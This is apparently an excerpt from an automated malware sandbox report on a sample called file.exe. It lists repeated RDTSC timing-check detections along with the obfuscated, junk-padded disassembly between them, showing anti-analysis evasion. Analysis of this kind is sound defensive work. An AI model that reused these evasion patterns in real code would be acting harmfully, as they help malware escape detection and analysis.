                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110E165 second address: 110E16B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110E2E0 second address: 110E30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC83CB64D36h 0x0000000a pushad 0x0000000b jmp 00007FC83CB64D45h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007FC83CB64D36h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110E30A second address: 110E30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110E47A second address: 110E484 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC83CB64D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110E484 second address: 110E48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110FDCE second address: 110FDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110FDD5 second address: 110FDDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110FDDA second address: 110FE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FC83CB64D3Ah 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jmp 00007FC83CB64D3Dh 0x0000001f push eax 0x00000020 push eax 0x00000021 pop eax 0x00000022 pop eax 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 jmp 00007FC83CB64D48h 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110FE2E second address: 110FE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110FE32 second address: 110FE4C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FC83CB64D3Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110FE4C second address: 110FF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 sub dword ptr [ebp+122D32AEh], ebx 0x0000000d push 00000003h 0x0000000f and cx, DD69h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 jno 00007FC83CB776ACh 0x0000001d pop esi 0x0000001e push 00000003h 0x00000020 jmp 00007FC83CB776B2h 0x00000025 call 00007FC83CB776A9h 0x0000002a jmp 00007FC83CB776B1h 0x0000002f push eax 0x00000030 jne 00007FC83CB776ACh 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a jmp 00007FC83CB776B3h 0x0000003f mov eax, dword ptr [eax] 0x00000041 jmp 00007FC83CB776B5h 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a jnl 00007FC83CB776BFh 0x00000050 pop eax 0x00000051 add esi, dword ptr [ebp+122D1AE6h] 0x00000057 lea ebx, dword ptr [ebp+12451CAEh] 0x0000005d pushad 0x0000005e mov esi, 1806DF8Fh 0x00000063 mov ebx, 6B90DE19h 0x00000068 popad 0x00000069 and ecx, 3E8F46DFh 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FC83CB776AFh 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110009 second address: 11100CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007FC83CB64D3Fh 0x0000000e mov eax, dword ptr [eax] 0x00000010 push ecx 0x00000011 jmp 00007FC83CB64D43h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push ecx 0x0000001c jmp 00007FC83CB64D48h 0x00000021 pop ecx 0x00000022 pop eax 0x00000023 jmp 00007FC83CB64D3Dh 0x00000028 push 00000003h 0x0000002a mov esi, dword ptr [ebp+122D3298h] 0x00000030 push 00000000h 0x00000032 jne 00007FC83CB64D3Ch 0x00000038 push 00000003h 0x0000003a call 00007FC83CB64D40h 0x0000003f xor edx, dword ptr [ebp+122D2C97h] 0x00000045 pop edi 0x00000046 call 00007FC83CB64D39h 0x0000004b push ebx 0x0000004c pushad 0x0000004d jmp 00007FC83CB64D47h 0x00000052 push edx 0x00000053 pop edx 0x00000054 popad 0x00000055 pop ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 jne 00007FC83CB64D38h 0x0000005e pop edx 0x0000005f mov eax, dword ptr [esp+04h] 0x00000063 pushad 0x00000064 pushad 0x00000065 push edi 0x00000066 pop edi 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11100CE second address: 111010B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FC83CB776BEh 0x0000000b jmp 00007FC83CB776B8h 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FC83CB776B5h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111010B second address: 1110124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110124 second address: 1110129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110129 second address: 111012E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1122380 second address: 112239E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FDBF second address: 112FDC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FDC4 second address: 112FDCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FF1F second address: 112FF2B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FF2B second address: 112FF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC83CB776A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11300A3 second address: 11300A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11300A9 second address: 11300AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130356 second address: 1130371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83CB64D47h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130371 second address: 1130384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130973 second address: 1130979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130979 second address: 113097D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113097D second address: 1130997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D41h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130997 second address: 11309C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FC83CB776AEh 0x00000011 push edi 0x00000012 pop edi 0x00000013 jnc 00007FC83CB776A6h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC83CB776B2h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11309C4 second address: 11309D8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83CB64D36h 0x00000008 jmp 00007FC83CB64D3Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130CB2 second address: 1130CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130CB7 second address: 1130CD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FC83CB64D36h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130CD1 second address: 1130CD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130CD5 second address: 1130CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128128 second address: 1128140 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC83CB776AEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128140 second address: 1128146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128146 second address: 1128166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC83CB776ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FC83CB776A6h 0x00000013 jc 00007FC83CB776A6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128166 second address: 112817E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC83CB64D42h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB9A3 second address: 10FB9A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB9A9 second address: 10FB9E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC83CB64D36h 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FC83CB64D3Ch 0x00000010 jmp 00007FC83CB64D43h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d jg 00007FC83CB64D36h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB9E1 second address: 10FBA26 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC83CB776ACh 0x0000000e jmp 00007FC83CB776B7h 0x00000013 jmp 00007FC83CB776B5h 0x00000018 popad 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FBA26 second address: 10FBA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130F9D second address: 1130FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC83CB776ADh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130FB3 second address: 1130FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130FB9 second address: 1130FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jc 00007FC83CB776ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130FC8 second address: 1130FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130FD0 second address: 1130FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130FD4 second address: 1130FDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113186B second address: 1131871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131871 second address: 113188E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D44h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113188E second address: 1131892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134537 second address: 1134540 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFCB1 second address: 10EFCD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC83CB776AAh 0x0000000d ja 00007FC83CB776A6h 0x00000013 jmp 00007FC83CB776ACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFCD7 second address: 10EFCE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFCE0 second address: 10EFCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFCE6 second address: 10EFCEC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110571C second address: 1105722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105722 second address: 110572D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110572D second address: 1105747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB776B3h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E2CD second address: 113E2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E2D3 second address: 113E2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E591 second address: 113E5AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E5AD second address: 113E5B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E5B1 second address: 113E5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E5B7 second address: 113E5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EB3A second address: 113EB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC83CB64D3Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EB50 second address: 113EB68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FC83CB776AEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114298C second address: 11429B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FC83CB64D3Ah 0x0000000f push edx 0x00000010 pop edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144ED7 second address: 1144EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144F6E second address: 1144F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11450F5 second address: 11450FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11450FA second address: 114510E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83CB64D40h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11455F5 second address: 11455FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145C1A second address: 1145C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145C1E second address: 1145C2F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145C2F second address: 1145C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145FB0 second address: 1145FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145FB5 second address: 1145FDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC83CB64D43h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146F81 second address: 1146F9B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC83CB776AEh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148B8E second address: 1148B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148B94 second address: 1148B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1148B98 second address: 1148B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149673 second address: 11496D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC83CB776A6h 0x00000009 jmp 00007FC83CB776AAh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push ecx 0x00000013 and edi, dword ptr [ebp+122D331Ah] 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FC83CB776A8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 sub edi, dword ptr [ebp+122D3348h] 0x0000003e xchg eax, ebx 0x0000003f ja 00007FC83CB776ACh 0x00000045 pushad 0x00000046 push edx 0x00000047 pop edx 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jnp 00007FC83CB776A6h 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11496D9 second address: 11496DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11496DD second address: 11496E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F202 second address: 114F208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
